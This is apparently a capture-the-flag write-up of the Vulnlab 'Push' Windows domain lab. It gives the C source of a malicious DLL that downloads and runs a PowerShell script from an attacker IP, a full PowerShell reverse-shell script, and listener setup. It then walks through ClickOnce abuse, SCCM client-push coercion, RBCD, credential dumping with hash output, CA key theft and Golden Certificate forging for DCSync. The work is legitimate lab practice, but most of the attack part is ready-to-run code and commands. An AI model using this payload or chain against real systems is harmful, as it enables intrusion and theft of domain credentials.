vulnlab-push
a hard windows machine involved obtaining credentials from FTP, having write access to smb share, placing the configuration and DLL file for abusing clickonce application to gain a shell on MS01, enumerating the domain to find about SCCM agent deployed on system, coercing authentication through client push installation and gaining sccadmin account which is a local admin on the system. As MS01 was a CA server as well, this lead to Golden Certificate to escalate privileges on the domain.
preperation
create puck.c on kali box
puck.c contains:
BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved){
system(“powershell IEX ([System.Text.Encoding]::ASCII.GetString((New-Object Net.Webclient).DownloadData(‘http://192.168.36.116:9000/puckshell.txt’)))”);
create malicious dll
puck@kali:~$ x86_64-w64-mingw32-gcc ./puck.c -shared -o puck.dll
puck@kali:~$ file puck.dll
puck.dll: PE32+ executable (DLL) (console) x86-64, for MS Windows
puckshell.txt contains:
if ($client.Connected -eq $true) {$client.Close()}
if ($process.ExitCode -ne $null) {$process.Close()}
$address = ‘192.168.1.136’
$client = New-Object system.net.sockets.tcpclient
$client.connect($address,$port)
$stream = $client.GetStream()
$networkbuffer = New-Object System.Byte[] $client.ReceiveBufferSize
$process = New-Object System.Diagnostics.Process
$process.StartInfo.FileName = ‘C:\\windows\\system32\\cmd.exe’
$process.StartInfo.RedirectStandardInput = 1
$process.StartInfo.RedirectStandardOutput = 1
$process.StartInfo.UseShellExecute = 0
$inputstream = $process.StandardInput
$outputstream = $process.StandardOutput
$encoding = new-object System.Text.AsciiEncoding
while($outputstream.Peek() -ne -1){$out += $encoding.GetString($outputstream.Read())}
$stream.Write($encoding.GetBytes($out),0,$out.Length)
$out = $null; $done = $false; $testing = 0;
if ($client.Connected -ne $true) {cleanup}
while (($i -gt 0) –and ($pos -lt $networkbuffer.Length)) {
$read = $stream.Read($networkbuffer,$pos,$networkbuffer.Length – $pos)
$pos+=$read; if ($pos –and ($networkbuffer[0..$($pos-1)] -contains 10)) {break}}
$string = $encoding.GetString($networkbuffer,0,$pos)
$inputstream.write($string)
if ($process.ExitCode -ne $null) {cleanup}
$out = $encoding.GetString($outputstream.Read())
while($outputstream.Peek() -ne -1){
$out += $encoding.GetString($outputstream.Read()); if ($out -eq $string) {$out = ”}}
$stream.Write($encoding.GetBytes($out),0,$out.length)
$string = $null}} else {cleanup}}
on attacker pc run http listener and nc listener
c:\PENTEST>python3 -m http.server 9000
Serving HTTP on :: port 9000 (http://[::]:9000/) …
::ffff:192.168.36.91 – – [22/Jul/2024 10:49:46] “GET /puckshell.txt HTTP/1.1” 200 –
::ffff:192.168.36.91 – – [22/Jul/2024 10:50:32] “GET /puckshell.txt HTTP/1.1” 200 –
c:\PENTEST>nc64.exe -nlvp 443
connect to [192.168.36.116] from (UNKNOWN) [192.168.36.91] 58868
Microsoft Windows [Version 10.0.22631.3880]
(c) Microsoft Corporation. Alle rechten voorbehouden.
C:\Windows\System32>whoami
test on windows target with
rundll32.exe C:\Payloads\puck.dll,XYZ
If all tests are succesfull, we continue to the writeup.
Writeup :
We can anonymous FTP login to ms01 , find a hidden file .git-credentials containing a username and Pasword
https://olivia.wood:DeployTrust07@github.com
To abuse clickonce we follow article , we need to upload our SelfService.dll.deploy , which will download and execute a reverse shell.
More to come …\
With shell as kelly.hill we find her credentials in her homefolder
evil-winrm –ip ms01.push.vl -u ‘kelly.hill’ -p ‘Sh<redacted>!’
xfreerdp /u:kelly.hill /p:‘Sh<redacted>!’ /v:ms01.push.vl /cert:ignore /rfx
Bloodhound Analysis:
bloodhound-python -d push.vl -v –zip -c all -u ‘olivia.wood’ -p ‘DeployTrust07’ -ns 10.10.198.149 –dns-tcp
Check Machine Quota
crackmapexec ldap dc01.push.vl -u “Olivia.Wood” -p “DeployTrust07” -M maq
PORT 445 (SMB)
Using credentials on MS01, we can enumerate the shares where we’ll find wwwroot share from the self service application is being hosted
Going into Application Files there are SelfService files
Abusing ClickOnce to gain foothold
This share is named as ClickOnce application dev share which is an easy deployment and execute technique based on user interaction, we did saw last-run.txt which is indicating that this selfservice is being executed after some time by the user
To abuse clickonce following this article , we need to place our crafted dll which will download and execute netcat on the victim machine through which we’ll gain the shell
After a minute we’ll see a hit on our python server and get a reverse shell as kelly.hill on netcat listener
From kelly’s desktop folder, we’ll also get her password : Sh<redacted>i!
We now can get a shell trough : evil-winrm –ip ms01.push.vl -u ‘kelly.hill’ -p ‘Sh<redacted>i!’
SCCM Coercion
With SharpSCCM we can cause an authentication coercion by Client Push Installation by obtaining NTLMv2 challenge response of the user which is running SCCM with local admin privilege on the system, capturing it through responder
SharpSCCM.exe invoke client-push -t 10.8.2.138
.
RBCD abuse
From bloodhound we see kelly.hill First Degree Object Control , has AllExtendedRights and WriteAccountRestrictions on MS01, which means that we can read all properties on MS01 and we can edit msDS-AllowedToActOnBehalfOfOtherIdentity to perform RBCD (Resource based constrained delegation) by having write account restrictions rights
┌──(puck㉿kali)–[~/vulnlab/push]
└─$ impacket-addcomputer -method LDAPS -computer-name ‘puckie’ -computer-pass ‘Summer2024!’ -dc-host dc01.push.vl -domain-netbios push.vl ‘push.vl/kelly.hill:Sh<redacted>i!’
Impacket v0.12.0.dev1 – Copyright 2023 Fortra
[*] Successfully added machine account puckie$ with password Summer2024!.
┌──(puck㉿kali)–[~/vulnlab/push]
└─$ impacket-rbcd -delegate-from ‘puckie$’ -delegate-to ‘MS01$’ -action ‘write’ ‘push.vl/kelly.hill:Sh<redacted>i!’
Impacket v0.12.0.dev1 – Copyright 2023 Fortra
[*] Accounts allowed to act on behalf of other identity:
[*] Delegation rights modified successfully!
[*] puckie$ can now impersonate users on MS01$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*] puckie$ (S-1–5–21–1451457175–172047642–1427519037–3603)
┌──(puck㉿kali)–[~/vulnlab/push]
└─$ impacket-getST -spn ‘cifs/ms01.push.vl’ -impersonate ‘administrator’ ‘push.vl/puckie$:Summer2024!’
Impacket v0.12.0.dev1 – Copyright 2023 Fortra
[–] CCache file is not found. Skipping…
[*] Impersonating administrator
[*] Saving ticket in administrator@cifs_ms01.push.vl@PUSH.VL.ccache
┌──(puck㉿kali)–[~/vulnlab/push]
└─$ export KRB5CCNAME=administrator@cifs_ms01.push.vl@PUSH.VL.ccache
┌──(puck㉿kali)–[~/vulnlab/push]
└─$ impacket-secretsdump -k ms01.push.vl
Impacket v0.12.0.dev1 – Copyright 2023 Fortra
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x1a2f736cde34f0733b3cc6f7ec68c413
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d8<redacted>61:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:d7da45674bae3a0476c0f64b67121f7d:::
[*] Dumping cached domain logon information (domain/username:hash)
PUSH.VL/Administrator:$DCC2$10240#Administrator#33<redacted>09: (2023-08-31 18:27:31)
PUSH.VL/Kelly.Hill:$DCC2$10240#Kelly.Hill#b0<redacted>29: (2023-09-02 11:17:04)
PUSH.VL/sccadmin:$DCC2$10240#sccadmin#0c<redacted>5c: (2023-08-31 10:26:08)
Now that we have the Administrator hash of ms01
┌──(puck㉿kali)–[~/vulnlab/push]
└─$ evil-winrm –ip ms01.push.vl -u ‘Administrator’ -H ‘d8<redacted>61’
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\kelly.hill\documents> dir
Directory: C:\Users\kelly.hill\documents
Mode LastWriteTime Length Name
-a—- 7/25/2024 7:39 AM 1125376 SharpSCCM.exe
*Evil-WinRM* PS C:\Users\kelly.hill\documents> .\SharpSCCM.exe local site-info
_______ _ _ _______ ______ _____ _______ _______ _______ _______
|______ |_____| |_____| |_____/ |_____] |______ | | | | |
______| | | | | | \_ | ______| |______ |______ | | | @_Mayyhem
[+] Connecting to \\127.0.0.1\root\CCM
[+] Executing WQL query: SELECT Name,CurrentManagementPoint FROM SMS_Authority
CurrentManagementPoint: DC01.push.vl
[+] Completed execution in 00:00:00.2090991
*Evil-WinRM* PS C:\Users\kelly.hill\documents>
.
┌──(sccmhunter)─(puck㉿kali)–[~/vulnlab/push/sccmhunter]
└─$ python3 sccmhunter.py find -u ‘sccadmin’ -p ‘7u<redacted>JM’ -dc-ip 10.10.188.181 -d push.vl -ldaps
SCCMHunter v1.0.5 by @garrfoster
[10:15:22] INFO [*] Checking for System Management Container.
[10:15:22] INFO [+] Found System Management Container. Parsing DACL.
[10:15:22] INFO [–] System Management Container not found.
[10:15:22] INFO [*] Searching LDAP for anything containing the strings ‘SCCM’ or ‘MECM’
[10:15:23] INFO [–] No results found.
┌──(sccmhunter)─(puck㉿kali)–[~/vulnlab/push/sccmhunter]
└─$ python3 sccmhunter.py smb -u ‘sccadmin’ -p ‘7u<redacted>JM’ -dc-ip 10.10.188.181 -d push.vl -ldaps
SCCMHunter v1.0.5 by @garrfoster
[10:17:30] INFO [–] No SiteServers found in database.
[10:17:30] INFO [–] No Management Points found in database.
[10:17:30] INFO [–] No computers found in database.
I could not solve sccadmin exploit , but with below it is giving the hash in responder
PS C:\Users\kelly.hill\Documents> .\SharpSCCM.exe invoke client-push -t 10.8.2.138 -mp DC01.push.vl -sc HQ0
.\SharpSCCM.exe invoke client-push -t 10.8.2.138 -mp DC01.push.vl -sc HQ0
_______ _ _ _______ ______ _____ _______ _______ _______ _______
|______ |_____| |_____| |_____/ |_____] |______ | | | | |
______| | | | | | \_ | ______| |______ |______ | | | @_Mayyhem
[+] Created “ConfigMgr Client Messaging” certificate in memory for device registration and signing/encrypting subsequent messages
[+] Reusable Base64-encoded certificate:
308209D20201033082098E06092A864886F70D010701A082097F0482097B308209773082059006092A864886F70D010701A00207D0
[+] Discovering local properties for client registration request
[+] Modifying client registration request properties:
[+] Sending HTTP registration request to DC01.push.vl:80
[+] Received unique SMS client GUID for new device:
GUID:7D070746-617E-4763–9835-F7811A6BED54
[+] Discovering local properties for DDR inventory report
[+] Modifying DDR and inventory report properties
[+] Discovered PlatformID: Microsoft Windows NT Advanced Server 10.0
[+] Modified PlatformID: Microsoft Windows NT Workstation 2010.0
[+] Sending DDR from GUID:7D070746-617E-4763–9835-F7811A6BED54 to MP_DdrEndpoint endpoint on DC01.push.vl:HQ0 and requesting client installation on 10.8.0.233
[+] Completed execution in 00:00:06.9340974
.
As we now have the pass of user sccadmin , we do a Golden Ticket attack
Escalating Privileges through Golden Certificate
As we now have the pass of user sccadmin ,but sccadmin doesn’t have any ACLs as we saw from bloodhound, the only thing left here is to enumerate MS01 CA (Certificate Authority) server
┌──(puck㉿kali)–[~/vulnlab/push]
└─$ crackmapexec smb dc01.push.vl -u “sccadmin” -p “7u<redacted>JM”
SMB DC01.push.vl 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:push.vl) (signing:True) (SMBv1:False)
SMB DC01.push.vl 445 DC01 [+] push.vl\sccadmin:7u<redacted>JM
golden Cerificate attack with certipy-ad & passthecert possible because we have system access to ms01 ( which is the CA )
So we basically have admin access on CA server which means we can extract the CA certificate and private key,
with that forging a certificate for domain admin through which we can obtain the NTHash or TGT of domain admin, this is known as Golden Certificate attack.
Using certipy we can take backup of CA certificate and private key
┌──(puck㉿kali)–[~/vulnlab/push]
└─$ certipy-ad ca -u sccadmin -p ‘7u<redacted>JM’ -target-ip MS01.push.vl -backup
Certipy v4.8.2 – by Oliver Lyak (ly4k)
[*] Got certificate and private key
[*] Saved certificate and private key to ‘CA.pfx’
┌──(puck㉿kali)-[~/vulnlab/push]
└─$ certipy-ad forge -ca-pfx CA.pfx -upn administrator@push.vl -subject ‘CN=Administrator,CN=Users,DC=PUSH,DC=VL’
Certipy v4.8.2 – by Oliver Lyak (ly4k) [*] Saved forged certificate and private key to ‘administrator_forged.pfx’
┌──(puck㉿kali)–[~/vulnlab/push]
└─$ certipy-ad cert -pfx administrator_forged.pfx -nokey -out administrator.crt
Certipy v4.8.2 – by Oliver Lyak (ly4k)
[*] Writing certificate and to ‘administrator.crt’
┌──(puck㉿kali)–[~/vulnlab/push]
└─$ certipy-ad cert -pfx administrator_forged.pfx -nocert -out administrator.key
Certipy v4.8.2 – by Oliver Lyak (ly4k)
[*] Writing private key to ‘administrator.key’
┌──(puck㉿kali)–[~/vulnlab/push]
└─$ python3 passthecert.py -action modify_user -crt administrator.crt -key administrator.key -target kelly.hill -elevate -domain push.vl -dc-host dc01.push.vl
Impacket v0.12.0.dev1 – Copyright 2023 Fortra
[*] Granted user ‘kelly.hill’ DCSYNC rights!
┌──(puck㉿kali)–[~/vulnlab/push]
└─$ impacket-secretsdump kelly.hill@DC01.push.vl
Impacket v0.12.0.dev1 – Copyright 2023 Fortra
Password: Shi<redacted>i!
[–] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 – rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0d<redacted>0f:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d9fd5a3d1406ca03668fcd04a0b4eb09:::
push.vl\svcsql:1104:aad3b435b51404eeaad3b435b51404ee:19<redacted>85:::
That was fun 🙂
.
references used
– sccm
– PassTheCert
– sharpcollection